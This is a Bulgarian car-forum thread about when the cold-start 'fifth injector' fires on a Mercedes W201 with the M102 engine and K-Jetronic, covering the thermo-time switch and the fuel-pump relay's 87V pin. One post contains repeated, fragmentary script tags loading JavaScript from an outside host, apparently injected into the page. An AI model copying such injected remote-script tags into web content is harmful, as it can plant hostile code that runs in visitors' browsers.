Здравейте колеги. Има ли някой информация при каква температура впръсква петата дюза и как се управлява.Вероятно има датчик ,който не знам къде се намира.
Пета дюза-кога впръсква?К-джетроник на 102 мотор
Started by nonev, 02 Jun 2009 - 07:29:13
3 replies to this topic
#1
Posted 02 June 2009 - 07:29
Кола от ремонт и жена от курорт трудно се вкарват в пътя
#2
Posted 04 June 2009 - 21:40
Колега, при по-старите w201 с К-Джетроник е с термо-реле за време - прилича на датчик за температура и е би-метална пластинка с нагревателче. Колкото по-топъл е мотора, толкова по-малко време му трябва да отлепи.
На по-новите К-Джетроници и КЕ-Джетроници се управлява през релето на помпата. Ако релето на помпата ти е с повечко крачета и едно от тях е обозначено 87V е за това. При управлението с релето на помпата над 15 градуса Т на мотора не пръска. Времето за пръскане също е функия на Т, при -20 пръска половин минута или повече, при 15 градуса 1-2 секунди.
На по-новите К-Джетроници и КЕ-Джетроници се управлява през релето на помпата. Ако релето на помпата ти е с повечко крачета и едно от тях е обозначено 87V е за това. При управлението с релето на помпата над 15 градуса Т на мотора не пръска. Времето за пръскане също е функия на Т, при -20 пръска половин минута или повече, при 15 градуса 1-2 секунди.
#3
Posted 12 June 2009 - 17:44
Реле от М102.962 , автоматик , 1989 г.
DSC00071.JPG 278.2K 53 downloads DSC00068.JPG 289.39K 46 downloads
Краче 87V е второто от дясно на ляво на долния ред.
DSC00071.JPG 278.2K 53 downloads DSC00068.JPG 289.39K 46 downloads
Краче 87V е второто от дясно на ляво на долния ред.
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#4
Posted 24 August 2009 - 17:05
Реле от М102.962 , автоматик , 1989 г.
DSC00071.JPG 278.2K 53 downloads DSC00068.JPG 289.39K 46 downloads
Краче 87V е второто от дясно на ляво на долния ред.
Според това което пише на релето излиза че това е ограничително реле за 4 цилиндров двигател и обороти на прекъсване 6200
Само вселената и човешката глупост могат да бъдат безкрайни.
1 user(s) are reading this topic
0 members, 1 guests, 0 anonymous users